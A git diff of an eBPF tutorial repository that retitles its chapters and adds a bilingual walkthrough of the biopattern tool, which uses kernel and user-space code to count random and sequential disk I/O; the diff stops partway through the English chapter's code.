diff --git a/src/0-introduce/README_en.md b/src/0-introduce/README_en.md
index 8dc2303..229e00e 100644
--- a/src/0-introduce/README_en.md
+++ b/src/0-introduce/README_en.md
@@ -1,6 +1,6 @@
-# eBPF Beginner's Development Tutorial 0: Introduction to the Basic Concepts of eBPF and Common Development Tools
+# eBPF Tutorial by Example 0: Introduction to Core Concepts and Tools
 
-## 1. Introduction to eBPF: Secure and Efficient Kernel Extension
+## Introduction to eBPF: Secure and Efficient Kernel Extension
 
 eBPF is a revolutionary technology that originated in the Linux kernel and allows sandbox programs to run in the kernel of an operating system. It is used to securely and efficiently extend the functionality of the kernel without the need to modify the kernel's source code or load kernel modules. By allowing the execution of sandbox programs in the operating system, eBPF enables application developers to dynamically add additional functionality to the operating system at runtime. The operating system then ensures security and execution efficiency, similar to performing native compilation with the help of a Just-In-Time (JIT) compiler and verification engine. eBPF programs are portable between kernel versions and can be automatically updated, avoiding workload interruptions and node restarts.
diff --git a/src/1-helloworld/README.md b/src/1-helloworld/README.md
index 7334e06..c40f7cf 100644
--- a/src/1-helloworld/README.md
+++ b/src/1-helloworld/README.md
@@ -190,4 +190,4 @@ eBPF 程序的开发和使用流程可以概括为如下几个步骤:
 
 需要注意的是,BPF 程序的执行是在内核空间进行的,因此需要使用特殊的工具和技术来编写、编译和调试 BPF 程序。eunomia-bpf 是一个开源的 BPF 编译器和工具包,它可以帮助开发者快速和简单地编写和运行 BPF 程序。
 
-您还可以访问我们的教程代码仓库 或网站 以获取更多示例和完整的教程,全部内容均已开源。我们会继续分享更多有关 eBPF 开发实践的内容,帮助您更好地理解和掌握 eBPF 技术。
+您还可以访问我们的教程代码仓库 以获取更多示例和完整的教程,全部内容均已开源。我们会继续分享更多有关 eBPF 开发实践的内容,帮助您更好地理解和掌握 eBPF 技术。
diff --git a/src/1-helloworld/README_en.md b/src/1-helloworld/README_en.md
index 2035e62..e456000 100644
--- a/src/1-helloworld/README_en.md
+++ b/src/1-helloworld/README_en.md
@@ -1,8 +1,8 @@
-# eBPF Getting Started Tutorial 1 Hello World, Basic Framework and Development Process
+# eBPF Tutorial by Example 1: Hello World, Basic Framework and Development Process
 
 In this blog post, we will delve into the basic framework and development process of eBPF (Extended Berkeley Packet Filter). eBPF is a powerful network and performance analysis tool that runs on the Linux kernel, providing developers with the ability to dynamically load, update, and run user-defined code at kernel runtime. This enables developers to implement efficient, secure kernel-level network monitoring, performance analysis, and troubleshooting functionalities.
 
-This article is the second part of the eBPF Getting Started Tutorial, where we will focus on how to write a simple eBPF program and demonstrate the entire development process through practical examples. Before reading this tutorial, it is recommended that you first learn the concepts of eBPF by studying the first tutorial.
+This article is the second part of the eBPF Tutorial by Example, where we will focus on how to write a simple eBPF program and demonstrate the entire development process through practical examples. Before reading this tutorial, it is recommended that you first learn the concepts of eBPF by studying the first tutorial.
 
 When developing eBPF programs, there are multiple development frameworks to choose from, such as BCC (BPF Compiler Collection), libbpf, cilium/ebpf, eunomia-bpf, etc. Although these tools have different characteristics, their basic development process is similar. In the following content, we will delve into these processes and use the Hello World program as an example to guide readers in mastering the basic skills of eBPF development.
diff --git a/src/10-hardirqs/README_en.md b/src/10-hardirqs/README_en.md
index e33c216..dd62997 100644
--- a/src/10-hardirqs/README_en.md
+++ b/src/10-hardirqs/README_en.md
@@ -1,8 +1,8 @@
-# eBPF Beginner's Development Tutorial Ten: Capturing Interrupt Events in eBPF Using hardirqs or softirqs
+# eBPF Tutorial by Example 10: Capturing Interrupt Events Using hardirqs or softirqs
 
 eBPF (Extended Berkeley Packet Filter) is a powerful network and performance analysis tool on the Linux kernel. It allows developers to dynamically load, update, and run user-defined code at runtime in the kernel.
 
-This article is the tenth part of the eBPF Beginner's Development Tutorial, focusing on capturing interrupt events using hardirqs or softirqs in eBPF.
+This article is the tenth part of the eBPF Tutorial by Example, focusing on capturing interrupt events using hardirqs or softirqs in eBPF.
 
 hardirqs and softirqs are two different types of interrupt handlers in the Linux kernel. They are used to handle interrupt requests generated by hardware devices, as well as asynchronous events in the kernel. In eBPF, we can use the eBPF tools hardirqs and softirqs to capture and analyze information related to interrupt handling in the kernel.
 
 ## What are hardirqs and softirqs?
@@ -234,7 +234,7 @@ This code is an eBPF program used to capture and analyze the execution informati
 
 The code for Softirq is similar, and I won't elaborate on it here.
 
-## Run code.Translated content:
+## Running the Code
 
 eunomia-bpf is an open-source eBPF dynamic loading runtime and development toolchain that combines Wasm. Its purpose is to simplify the development, building, distribution, and execution of eBPF programs. You can refer to the eunomia-bpf documentation to download and install the ecc compilation toolchain and ecli runtime. We use eunomia-bpf to compile and run this example.
@@ -254,8 +254,8 @@ sudo ecli run ./package.json
 
 ## Summary
 
-In this chapter (eBPF Getting Started Tutorial Ten: Capturing Interrupt Events in eBPF with Hardirqs or Softirqs), we learned how to capture and analyze the execution information of hardware interrupt handlers (hardirqs) in the kernel using eBPF programs. We explained the example code in detail, including how to define data structures, mappings, eBPF program entry points, and how to call helper functions to record execution information at the entry and exit points of interrupt handlers.
+In this chapter (eBPF Tutorial by Example 10: Capturing Interrupt Events Using hardirqs or softirqs), we learned how to capture and analyze the execution information of hardware interrupt handlers (hardirqs) in the kernel using eBPF programs. We explained the example code in detail, including how to define data structures, maps, eBPF program entry points, and how to call helper functions to record execution information at the entry and exit points of interrupt handlers.
 
 By studying the content of this chapter, you should have mastered the methods of capturing interrupt events with hardirqs or softirqs in eBPF, as well as how to analyze these events to identify performance issues and other problems related to interrupt handling in the kernel. These skills are crucial for analyzing and optimizing the performance of the Linux kernel.
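+
+As a quick cross-check, you can also count hard interrupts by handler name with a bpftrace one-liner and compare its output with this tool. This is only a sketch and assumes bpftrace is installed on your system:
+
+```bash
+# Count hard interrupts by handler name until Ctrl-C is pressed
+sudo bpftrace -e 'tracepoint:irq:irq_handler_entry { @[str(args->name)] = count(); }'
+```
+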
-To better understand and practice eBPF programming, we recommend reading the official documentation of eunomia-bpf: . In addition, we provide a complete tutorial and source code for you to view and learn from at . We hope this tutorial can help you get started with eBPF development smoothly and provide useful references for your further learning and practice."
\ No newline at end of file
+To better understand and practice eBPF programming, we recommend reading the official documentation of eunomia-bpf: . In addition, we provide a complete tutorial and source code for you to view and learn from at .
diff --git a/src/11-bootstrap/README_en.md b/src/11-bootstrap/README_en.md
index c3b7890..50139ad 100644
--- a/src/11-bootstrap/README_en.md
+++ b/src/11-bootstrap/README_en.md
@@ -1,4 +1,4 @@
-# eBPF Beginner's Development Practice Tutorial 11: Using libbpf to Develop User-Space Programs in eBPF and Trace exec() and exit() System Calls
+# eBPF Tutorial by Example 11: Using libbpf to Develop User-Space Programs in eBPF and Trace exec() and exit() System Calls
 
 eBPF (Extended Berkeley Packet Filter) is a powerful network and performance analysis tool on the Linux kernel. It allows developers to dynamically load, update, and run user-defined code during kernel runtime.
diff --git a/src/12-profile/README_en.md b/src/12-profile/README_en.md
index 74b439f..f96fc50 100644
--- a/src/12-profile/README_en.md
+++ b/src/12-profile/README_en.md
@@ -1,4 +1,4 @@
-# eBPF Beginner's Practical Tutorial 12: Using eBPF Program Profile for Performance Analysis
+# eBPF Tutorial by Example 12: Using eBPF Program Profile for Performance Analysis
 
 This tutorial will guide you on using libbpf and eBPF programs for performance analysis. We will leverage the perf mechanism in the kernel to learn how to capture the execution time of functions and view performance data.
diff --git a/src/13-tcpconnlat/README_en.md b/src/13-tcpconnlat/README_en.md
index 9b42587..92999b4 100644
--- a/src/13-tcpconnlat/README_en.md
+++ b/src/13-tcpconnlat/README_en.md
@@ -1,8 +1,8 @@
-# eBPF Beginner's Development Practice Tutorial 13: Statistics of TCP Connection Delay and Data Processing in User Space Using libbpf
+# eBPF Tutorial by Example 13: Measuring TCP Connection Latency and Processing Data in User Space with libbpf
 
 eBPF (Extended Berkeley Packet Filter) is a powerful network and performance analysis tool used in the Linux kernel. eBPF allows developers to dynamically load, update, and run user-defined code without restarting the kernel or changing the kernel source code.
 
-This article is the thirteenth installment of the eBPF beginner's development practice tutorial, mainly about how to use eBPF to statistics TCP connection delay and process data in user space using libbpf.
+This article is the thirteenth installment of the eBPF Tutorial by Example, mainly about how to use eBPF to measure TCP connection latency and process the data in user space with libbpf.
 
 ## Background
diff --git a/src/14-tcpstates/README_en.md b/src/14-tcpstates/README_en.md
index 68ce2f9..12346b0 100644
--- a/src/14-tcpstates/README_en.md
+++ b/src/14-tcpstates/README_en.md
@@ -1,8 +1,8 @@
-# eBPF Introductory Practice Tutorial 14: Recording TCP Connection Status and TCP RTT
+# eBPF Tutorial by Example 14: Recording TCP Connection Status and TCP RTT
 
 eBPF (Extended Berkeley Packet Filter) is a powerful network and performance analysis tool widely used in the Linux kernel. eBPF allows developers to dynamically load, update, and run user-defined code without restarting the kernel or changing the kernel source code.
 
-In this article of our eBPF introductory practice tutorial series, we will introduce two sample programs: `tcpstates` and `tcprtt`. `tcpstates` is used to record the state changes of TCP connections, while `tcprtt` is used to record the Round-Trip Time (RTT) of TCP.
+In this article of our eBPF Tutorial by Example series, we will introduce two sample programs: `tcpstates` and `tcprtt`. `tcpstates` is used to record the state changes of TCP connections, while `tcprtt` is used to record the Round-Trip Time (RTT) of TCP.
 
 ## `tcprtt` and `tcpstates`
diff --git a/src/15-javagc/README_en.md b/src/15-javagc/README_en.md
index 7d84a3e..742e974 100644
--- a/src/15-javagc/README_en.md
+++ b/src/15-javagc/README_en.md
@@ -1,8 +1,8 @@
-# eBPF Introduction Tutorial 15: Capturing User-Space Java GC Event Duration Using USDT
+# eBPF Tutorial by Example 15: Capturing User-Space Java GC Event Duration Using USDT
 
 eBPF (Extended Berkeley Packet Filter) is a powerful network and performance analysis tool widely used in the Linux kernel. eBPF allows developers to dynamically load, update, and run user-defined code without the need to restart the kernel or modify the kernel source code. This feature provides eBPF with high flexibility and performance, making it widely applicable in network and system performance analysis. Furthermore, eBPF also supports capturing user-space application behavior using User-Level Statically Defined Tracing (USDT).
 
-In this article of our eBPF introduction tutorial series, we will explore how to use eBPF and USDT to capture and analyze the duration of Java garbage collection (GC) events.
+In this article of our eBPF Tutorial by Example series, we will explore how to use eBPF and USDT to capture and analyze the duration of Java garbage collection (GC) events.
 
 ## Introduction to USDT
@@ -98,10 +98,9 @@ struct {
 } data_map SEC(".maps");
 
 struct {
-    __uint(type, BPF_MAP_TYPE_PERF_EVENT_ARRAY);
-``````cpp
-__type(key, int);
-__type(value, int);
+    __uint(type, BPF_MAP_TYPE_PERF_EVENT_ARRAY);
+    __type(key, int);
+    __type(value, int);
 } perf_map SEC(".maps");
 
 __u32 time;
diff --git a/src/16-memleak/README_en.md b/src/16-memleak/README_en.md
index a69a320..c953784 100644
--- a/src/16-memleak/README_en.md
+++ b/src/16-memleak/README_en.md
@@ -1,4 +1,4 @@
-# eBPF Getting Started Tutorial 16: Writing eBPF Program Memleak for Monitoring Memory Leaks
+# eBPF Tutorial by Example 16: Memleak for Monitoring Memory Leaks
 
 eBPF (extended Berkeley Packet Filter) is a powerful network and performance analysis tool that is widely used in the Linux kernel. eBPF allows developers to dynamically load, update, and run user-defined code without restarting the kernel or modifying its source code.
diff --git a/src/17-biopattern/README.md b/src/17-biopattern/README.md
index ed834c8..0fb5845 100644
--- a/src/17-biopattern/README.md
+++ b/src/17-biopattern/README.md
@@ -1,23 +1,329 @@
-# eBPF 入门实践教程:编写 eBPF 程序 Biopattern: 统计随机/顺序磁盘 I/O
+# eBPF 入门实践教程十七:编写 eBPF 程序统计随机/顺序磁盘 I/O
 
-## 背景
+eBPF(扩展的伯克利数据包过滤器)是 Linux 内核中的一种新技术,允许用户在内核空间中执行自定义程序,而无需更改内核代码。这为系统管理员和开发者提供了强大的工具,可以深入了解和监控系统的行为,从而进行优化。
+
+在本篇教程中,我们将探索如何使用 eBPF 编写程序来统计随机和顺序的磁盘 I/O。磁盘 I/O 是计算机性能的关键指标之一,特别是在数据密集型应用中。
+
+## 随机/顺序磁盘 I/O
+
+随着技术的进步和数据量的爆炸性增长,磁盘 I/O 成为了系统性能的关键瓶颈。应用程序的性能很大程度上取决于其如何与存储层进行交互。因此,深入了解和优化磁盘 I/O,特别是随机和顺序的 I/O,变得尤为重要。
+
+1. **随机 I/O**:随机 I/O 发生在应用程序从磁盘的非连续位置读取或写入数据时。这种 I/O 模式的主要特点是磁盘头需要频繁地在不同的位置之间移动,导致其通常比顺序 I/O 的速度慢。典型的产生随机 I/O 的场景包括数据库查询、文件系统的元数据操作以及虚拟化环境中的并发任务。
+
+2. **顺序 I/O**:与随机 I/O 相反,顺序 I/O 是当应用程序连续地读取或写入磁盘上的数据块。这种 I/O 模式的优势在于磁盘头可以在一个方向上连续移动,从而大大提高了数据的读写速度。视频播放、大型文件的下载或上传以及连续的日志记录都是产生顺序 I/O 的典型应用。
+
+为了实现存储性能的最优化,了解随机和顺序的磁盘 I/O 是至关重要的。例如,随机 I/O 敏感的应用程序在 SSD 上的性能通常远超于传统硬盘,因为 SSD 在处理随机 I/O 时几乎没有寻址延迟。相反,对于大量顺序 I/O 的应用,如何最大化磁盘的连续读写速度则更为关键。
+
+在本教程的后续部分,我们将详细探讨如何使用 eBPF 工具来实时监控和统计这两种类型的磁盘 I/O。这不仅可以帮助我们更好地理解系统的 I/O 行为,还可以为进一步的性能优化提供有力的数据支持。
+
+## Biopattern
 
 Biopattern 可以统计随机/顺序磁盘I/O次数的比例。
 
-TODO
+首先,确保你已经正确安装了 libbpf 和相关的工具集,可以在这里找到对应的源代码:[bpf-developer-tutorial](https://github.com/eunomia-bpf/bpf-developer-tutorial)
 
-## 实现原理
+导航到 `biopattern` 的源代码目录,并使用 `make` 命令进行编译:
 
-Biopattern 的ebpf代码在 tracepoint/block/block_rq_complete 挂载点下实现。在磁盘完成IO请求
-后,程序会经过此挂载点。Biopattern 内部存有一张以设备号为主键的哈希表,当程序经过挂载点时, Biopattern
-会获得操作信息,根据哈希表中该设备的上一次操作记录来判断本次操作是随机IO还是顺序IO,并更新操作计数。
+```bash
+cd ~/bpf-developer-tutorial/src/17-biopattern
+make
+```
 
-## 编写 eBPF 程序
+编译成功后,你应该可以在当前目录下看到 `biopattern` 的可执行文件。基本的运行命令如下:
 
-TODO
+```bash
+sudo ./biopattern [interval] [count]
+```
 
-### 总结
+例如,要每秒打印一次输出,并持续10秒,你可以运行:
 
-Biopattern 可以展现随机/顺序磁盘I/O次数的比例,对于开发者把握整体I/O情况有较大帮助。
+```console
+$ sudo ./biopattern 1 10
+Tracing block device I/O requested seeks... Hit Ctrl-C to end.
+DISK     %RND  %SEQ    COUNT     KBYTES
+sr0         0   100        3          0
+sr1         0   100        8          0
+sda         0   100        1          4
+sda       100     0       26        136
+sda         0   100        1          4
+```
 
-TODO
+输出列的含义如下:
+
+- `DISK`:被追踪的磁盘名称。
+- `%RND`:随机 I/O 的百分比。
+- `%SEQ`:顺序 I/O 的百分比。
+- `COUNT`:在指定的时间间隔内的 I/O 请求次数。
+- `KBYTES`:在指定的时间间隔内读写的数据量(以 KB 为单位)。
+
+从上述输出中,我们可以得出以下结论:
+
+- `sr0` 和 `sr1` 设备在观测期间主要进行了顺序 I/O,但数据量很小。
+- `sda` 设备在某些时间段内只进行了随机 I/O,而在其他时间段内只进行了顺序 I/O。
+
+这些信息可以帮助我们了解系统的 I/O 模式,从而进行针对性的优化。
+
+## eBPF Biopattern 实现原理
+
+首先,让我们看一下 biopattern 的核心 eBPF 内核态代码:
+
+```c
+#include <vmlinux.h>
+#include <bpf/bpf_helpers.h>
+#include <bpf/bpf_core_read.h>
+#include "biopattern.h"
+#include "maps.bpf.h"
+#include "core_fixes.bpf.h"
+
+const volatile bool filter_dev = false;
+const volatile __u32 targ_dev = 0;
+
+struct {
+    __uint(type, BPF_MAP_TYPE_HASH);
+    __uint(max_entries, 64);
+    __type(key, u32);
+    __type(value, struct counter);
+} counters SEC(".maps");
+
+SEC("tracepoint/block/block_rq_complete")
+int handle__block_rq_complete(void *args)
+{
+    struct counter *counterp, zero = {};
+    sector_t sector;
+    u32 nr_sector;
+    u32 dev;
+
+    if (has_block_rq_completion()) {
+        struct trace_event_raw_block_rq_completion___x *ctx = args;
+        sector = BPF_CORE_READ(ctx, sector);
+        nr_sector = BPF_CORE_READ(ctx, nr_sector);
+        dev = BPF_CORE_READ(ctx, dev);
+    } else {
+        struct trace_event_raw_block_rq_complete___x *ctx = args;
+        sector = BPF_CORE_READ(ctx, sector);
+        nr_sector = BPF_CORE_READ(ctx, nr_sector);
+        dev = BPF_CORE_READ(ctx, dev);
+    }
+
+    if (filter_dev && targ_dev != dev)
+        return 0;
+
+    counterp = bpf_map_lookup_or_try_init(&counters, &dev, &zero);
+    if (!counterp)
+        return 0;
+    if (counterp->last_sector) {
+        if (counterp->last_sector == sector)
+            __sync_fetch_and_add(&counterp->sequential, 1);
+        else
+            __sync_fetch_and_add(&counterp->random, 1);
+        __sync_fetch_and_add(&counterp->bytes, nr_sector * 512);
+    }
+    counterp->last_sector = sector + nr_sector;
+    return 0;
+}
+
+char LICENSE[] SEC("license") = "GPL";
+```
+
+1. 全局变量定义
+
+```c
+    const volatile bool filter_dev = false;
+    const volatile __u32 targ_dev = 0;
+```
+
+这两个全局变量用于设备过滤。`filter_dev` 决定是否启用设备过滤,而 `targ_dev` 是我们想要追踪的目标设备的标识符。
+
+2. BPF map 定义:
+
+```c
+    struct {
+        __uint(type, BPF_MAP_TYPE_HASH);
+        __uint(max_entries, 64);
+        __type(key, u32);
+        __type(value, struct counter);
+    } counters SEC(".maps");
+```
+
+这部分代码定义了一个 BPF map,类型为哈希表。该映射的键是设备的标识符,而值是一个 `counter` 结构体,用于存储设备的 I/O 统计信息。
+
+3. 追踪点函数:
+
+```c
+    SEC("tracepoint/block/block_rq_complete")
+    int handle__block_rq_complete(void *args)
+    {
+        struct counter *counterp, zero = {};
+        sector_t sector;
+        u32 nr_sector;
+        u32 dev;
+
+        if (has_block_rq_completion()) {
+            struct trace_event_raw_block_rq_completion___x *ctx = args;
+            sector = BPF_CORE_READ(ctx, sector);
+            nr_sector = BPF_CORE_READ(ctx, nr_sector);
+            dev = BPF_CORE_READ(ctx, dev);
+        } else {
+            struct trace_event_raw_block_rq_complete___x *ctx = args;
+            sector = BPF_CORE_READ(ctx, sector);
+            nr_sector = BPF_CORE_READ(ctx, nr_sector);
+            dev = BPF_CORE_READ(ctx, dev);
+        }
+
+        if (filter_dev && targ_dev != dev)
+            return 0;
+
+        counterp = bpf_map_lookup_or_try_init(&counters, &dev, &zero);
+        if (!counterp)
+            return 0;
+        if (counterp->last_sector) {
+            if (counterp->last_sector == sector)
+                __sync_fetch_and_add(&counterp->sequential, 1);
+            else
+                __sync_fetch_and_add(&counterp->random, 1);
+            __sync_fetch_and_add(&counterp->bytes, nr_sector * 512);
+        }
+        counterp->last_sector = sector + nr_sector;
+        return 0;
+    }
+```
+
+在 Linux 中,每次块设备的 I/O 请求完成时,都会触发一个名为 `block_rq_complete` 的追踪点。这为我们提供了一个机会,通过 eBPF 来捕获这些事件,并进一步分析 I/O 的模式。
+
+主要逻辑分析:
+
+- **提取 I/O 请求信息**:从传入的参数中获取 I/O 请求的相关信息。这里有两种可能的上下文结构,取决于 `has_block_rq_completion` 的返回值,这是因为不同版本的 Linux 内核可能会有不同的追踪点定义。无论哪种情况,我们都从上下文中提取出扇区号(`sector`)、扇区数量(`nr_sector`)和设备标识符(`dev`)。
+- **设备过滤**:如果启用了设备过滤(`filter_dev` 为 `true`),并且当前设备不是目标设备(`targ_dev`),则直接返回。这允许用户只追踪特定的设备,而不是所有设备。
+- **统计信息更新**:
+  - **查找或初始化统计信息**:使用 `bpf_map_lookup_or_try_init` 函数查找或初始化与当前设备相关的统计信息。如果映射中没有当前设备的统计信息,它会使用 `zero` 结构体进行初始化。
+  - **判断 I/O 模式**:根据当前 I/O 请求与上一个 I/O 请求的扇区号,我们可以判断当前请求是随机的还是顺序的。如果当前请求的起始扇区恰好等于上一次请求结束的位置(即 `last_sector`),那么它是顺序的;否则,它是随机的。然后,我们使用 `__sync_fetch_and_add` 函数更新相应的统计信息。这是一个原子操作,确保在并发环境中数据的一致性。
+  - **更新数据量**:我们还更新了该设备的总数据量,这是通过将扇区数量(`nr_sector`)乘以 512(每个扇区的字节数)来实现的。
+  - **更新最后一个 I/O 请求的扇区号**:为了下一次的比较,我们更新了 `last_sector` 的值,使其指向本次请求结束的位置。
+
+在 Linux 内核的某些版本中,由于引入了一个新的追踪点 `block_rq_error`,追踪点的命名和结构发生了变化:原先 `block_rq_complete` 追踪点的结构名称从 `trace_event_raw_block_rq_complete` 更改为 `trace_event_raw_block_rq_completion`。这种变化可能会导致 eBPF 程序在不同版本的内核上出现兼容性问题。
+
+为了解决这个问题,`biopattern` 工具引入了一种机制来动态检测当前内核使用的是哪种追踪点结构,即 `has_block_rq_completion` 函数。
+
+1. 
**定义两种追踪点结构**: + +```c + struct trace_event_raw_block_rq_complete___x { + dev_t dev; + sector_t sector; + unsigned int nr_sector; + } __attribute__((preserve_access_index)); + + struct trace_event_raw_block_rq_completion___x { + dev_t dev; + sector_t sector; + unsigned int nr_sector; + } __attribute__((preserve_access_index)); +``` + +这里定义了两种追踪点结构,分别对应于不同版本的内核。每种结构都包含设备标识符 (`dev`)、扇区号 (`sector`) 和扇区数量 (`nr_sector`)。 + +**动态检测追踪点结构**: + +```c + static __always_inline bool has_block_rq_completion() + { + if (bpf_core_type_exists(struct trace_event_raw_block_rq_completion___x)) + return true; + return false; + } +``` + +`has_block_rq_completion` 函数使用 `bpf_core_type_exists` 函数来检测当前内核是否存在 `trace_event_raw_block_rq_completion___x` 结构。如果存在,函数返回 `true`,表示当前内核使用的是新的追踪点结构;否则,返回 `false`,表示使用的是旧的结构。在对应的 eBPF 代码中,会根据两种不同的定义分别进行处理,这也是适配不同内核版本之间的变更常见的方案。 + +### 用户态代码 + +`biopattern` 工具的用户态代码负责从 BPF 映射中读取统计数据,并将其展示给用户。通过这种方式,系统管理员可以实时监控每个设备的 I/O 模式,从而更好地理解和优化系统的 I/O 性能。 + +主循环: + +```c + /* main: poll */ + while (1) { + sleep(env.interval); + + err = print_map(obj->maps.counters, partitions); + if (err) + break; + + if (exiting || --env.times == 0) + break; + } +``` + +这是 `biopattern` 工具的主循环,它的工作流程如下: + +- **等待**:使用 `sleep` 函数等待指定的时间间隔 (`env.interval`)。 +- **打印映射**:调用 `print_map` 函数打印 BPF 映射中的统计数据。 +- **退出条件**:如果收到退出信号 (`exiting` 为 `true`) 或者达到指定的运行次数 (`env.times` 达到 0),则退出循环。 + +打印映射函数: + +```c + static int print_map(struct bpf_map *counters, struct partitions *partitions) + { + __u32 total, lookup_key = -1, next_key; + int err, fd = bpf_map__fd(counters); + const struct partition *partition; + struct counter counter; + struct tm *tm; + char ts[32]; + time_t t; + + while (!bpf_map_get_next_key(fd, &lookup_key, &next_key)) { + err = bpf_map_lookup_elem(fd, &next_key, &counter); + if (err < 0) { + fprintf(stderr, "failed to lookup counters: %d\n", err); + return -1; + } + lookup_key = next_key; + total = counter.sequential + counter.random; + if (!total) + continue; + if (env.timestamp) { + time(&t); + tm = localtime(&t); + strftime(ts, sizeof(ts), "%H:%M:%S", tm); + printf("%-9s ", ts); + } + partition = partitions__get_by_dev(partitions, next_key); + printf("%-7s %5ld %5ld %8d %10lld\n", + partition ? 
partition->name : "Unknown",
+            counter.random * 100L / total,
+            counter.sequential * 100L / total, total,
+            counter.bytes / 1024);
+    }
+
+    lookup_key = -1;
+    while (!bpf_map_get_next_key(fd, &lookup_key, &next_key)) {
+        err = bpf_map_delete_elem(fd, &next_key);
+        if (err < 0) {
+            fprintf(stderr, "failed to cleanup counters: %d\n", err);
+            return -1;
+        }
+        lookup_key = next_key;
+    }
+
+    return 0;
+}
+```
+
+`print_map` 函数负责从 BPF 映射中读取统计数据,并将其打印到控制台。其主要逻辑如下:
+
+- **遍历 BPF 映射**:使用 `bpf_map_get_next_key` 和 `bpf_map_lookup_elem` 函数遍历 BPF 映射,获取每个设备的统计数据。
+- **计算总数**:计算每个设备的随机和顺序 I/O 的总数。
+- **打印统计数据**:如果启用了时间戳(`env.timestamp` 为 `true`),则首先打印当前时间。接着,打印设备名称、随机 I/O 的百分比、顺序 I/O 的百分比、总 I/O 数量和总数据量(以 KB 为单位)。
+- **清理 BPF 映射**:为了下一次的统计,使用 `bpf_map_get_next_key` 和 `bpf_map_delete_elem` 函数清理 BPF 映射中的所有条目。
+
+## 总结
+
+在本教程中,我们深入探讨了如何使用 eBPF 工具 biopattern 来实时监控和统计随机和顺序的磁盘 I/O。我们首先了解了随机和顺序磁盘 I/O 的重要性,以及它们对系统性能的影响。接着,我们详细介绍了 biopattern 的工作原理,包括如何定义和使用 BPF maps,如何处理不同版本的 Linux 内核中的追踪点变化,以及如何在 eBPF 程序中捕获和分析磁盘 I/O 事件。
+
+您可以访问我们的教程代码仓库 或网站 以获取更多示例和完整的教程。
+
+- 完整代码:
+- bcc 工具:
diff --git a/src/17-biopattern/README_en.md b/src/17-biopattern/README_en.md
index e384494..532786b 100644
--- a/src/17-biopattern/README_en.md
+++ b/src/17-biopattern/README_en.md
@@ -1,21 +1,330 @@
-# eBPF Getting Started Tutorial: Writing eBPF Program Biopattern: Statistical Random/Sequential Disk I/O
+# eBPF Tutorial by Example 17: Counting Random/Sequential Disk I/O
 
-## Background
+eBPF (Extended Berkeley Packet Filter) is a new technology in the Linux kernel that allows users to execute custom programs in kernel space without changing the kernel code. This provides system administrators and developers with powerful tools to gain insight into and monitor system behaviour for optimisation.
 
-Biopattern can statistically count the ratio of random/sequential disk I/O.
+In this tutorial, we will explore how to use eBPF to write programs to count random and sequential disk I/O. Disk I/O is one of the key metrics of computer performance, especially in data-intensive applications.
 
-TODO
+## Random/Sequential Disk I/O
 
-## Implementation Principle
+As technology advances and data volumes explode, disk I/O becomes a critical bottleneck in system performance. The performance of an application depends heavily on how it interacts with the storage tier. Therefore, it becomes especially important to deeply understand and optimise disk I/O, especially random and sequential I/O.
 
-The ebpf code of Biopattern is implemented under the mount point tracepoint/block/block_rq_complete. After the disk completes an IO request, the program will pass through this mount point. Biopattern has an internal hash table with device number as the primary key. When the program passes through the mount point, Biopattern obtains the operation information and determines whether the current operation is random or sequential IO based on the previous operation record of the device in the hash table, and updates the operation count.
+1. **Random I/O**: Random I/O occurs when an application reads or writes data from or to a non-sequential location on the disk. The main characteristic of this I/O mode is that the disk head needs to move frequently between locations, causing it to be typically slower than sequential I/O. Typical scenarios that generate random I/O include database queries, file system metadata operations, and concurrent tasks in virtualised environments.
 
-## Writing eBPF Program
+2. **Sequential I/O**: In contrast to random I/O, sequential I/O occurs when an application continuously reads or writes blocks of data to or from disk. The advantage of this I/O mode is that the disk head can move continuously in one direction, which greatly increases the speed at which data can be read and written. Video playback, downloading or uploading large files, and continuous logging are typical applications that generate sequential I/O.
 
-TODO
+To optimise storage performance, it is critical to understand both random and sequential disk I/O. For example, random I/O-sensitive applications typically perform far better on SSDs than on traditional hard drives because SSDs have virtually no addressing latency when dealing with random I/Os. Conversely, for applications with a lot of sequential I/O, it is much more critical to maximise the sequential read and write speed of the disk.
 
-### Summary
+In the rest of this tutorial, we will discuss in detail how to use the eBPF tool to monitor and count both types of disk I/O in real time. This will not only help us better understand the I/O behaviour of the system, but will also provide solid data for further performance optimisation.
 
-Biopattern can show the ratio of random/sequential disk I/O, which is very helpful for developers to grasp the overall I/O situation.
+## Biopattern
 
-TODO
\ No newline at end of file
+Biopattern counts the percentage of random/sequential disk I/Os.
+
+First of all, make sure that you have installed libbpf and the associated toolset correctly. You can find the source code here: [bpf-developer-tutorial](https://github.com/eunomia-bpf/bpf-developer-tutorial)
+
+Navigate to the `biopattern` source directory and compile it using the `make` command:
+
+```bash
+cd ~/bpf-developer-tutorial/src/17-biopattern
+make
+```
+
+After successful compilation, you should see the `biopattern` executable in the current directory. The basic run command is as follows:
+
+```bash
+sudo ./biopattern [interval] [count]
+```
+
+For example, to print the output once per second for 10 seconds, you can run:
+
+```console
+$ sudo ./biopattern 1 10
+Tracing block device I/O requested seeks... Hit Ctrl-C to end.
+DISK     %RND  %SEQ    COUNT     KBYTES
+sr0         0   100        3          0
+sr1         0   100        8          0
+sda         0   100        1          4
+sda       100     0       26        136
+sda         0   100        1          4
+```
+
+The output columns have the following meanings:
+
+- `DISK`: Name of the disk being tracked.
+- `%RND`: Percentage of random I/O.
+- `%SEQ`: Percentage of sequential I/O.
+- `COUNT`: Number of I/O requests in the specified interval.
+- `KBYTES`: Amount of data (in KB) read and written in the specified time interval.
+
+From the above output, we can draw the following conclusions:
+
+- The `sr0` and `sr1` devices performed mostly sequential I/O during the observation period, but the amount of data was small.
+- The `sda` device performed only random I/O during some time periods and only sequential I/O during other time periods.
+
+This information can help us understand the I/O pattern of the system so that we can perform targeted optimisation.
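+
+If you want to see the two patterns side by side, you can generate contrasting test workloads while biopattern is running. The sketch below is only an illustration and assumes the `fio` tool is installed (it is not part of this tutorial's toolchain):
+
+```bash
+# Hypothetical test workloads to exercise biopattern, assuming fio is installed.
+# Sequential reads: large blocks, one continuous stream.
+fio --name=seq --rw=read --bs=1M --size=256M --filename=/tmp/fio-test
+# Random reads: small blocks scattered across the same file.
+fio --name=rand --rw=randread --bs=4k --size=256M --filename=/tmp/fio-test
+```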
+
+## eBPF Biopattern Implementation Principles
+
+First, let's look at the eBPF kernel-mode code at the heart of biopattern:
+
+```c
+#include <vmlinux.h>
+#include <bpf/bpf_helpers.h>
+#include <bpf/bpf_core_read.h>
+#include "biopattern.h"
+#include "maps.bpf.h"
+#include "core_fixes.bpf.h"
+
+const volatile bool filter_dev = false;
+const volatile __u32 targ_dev = 0;
+
+struct {
+    __uint(type, BPF_MAP_TYPE_HASH);
+    __uint(max_entries, 64);
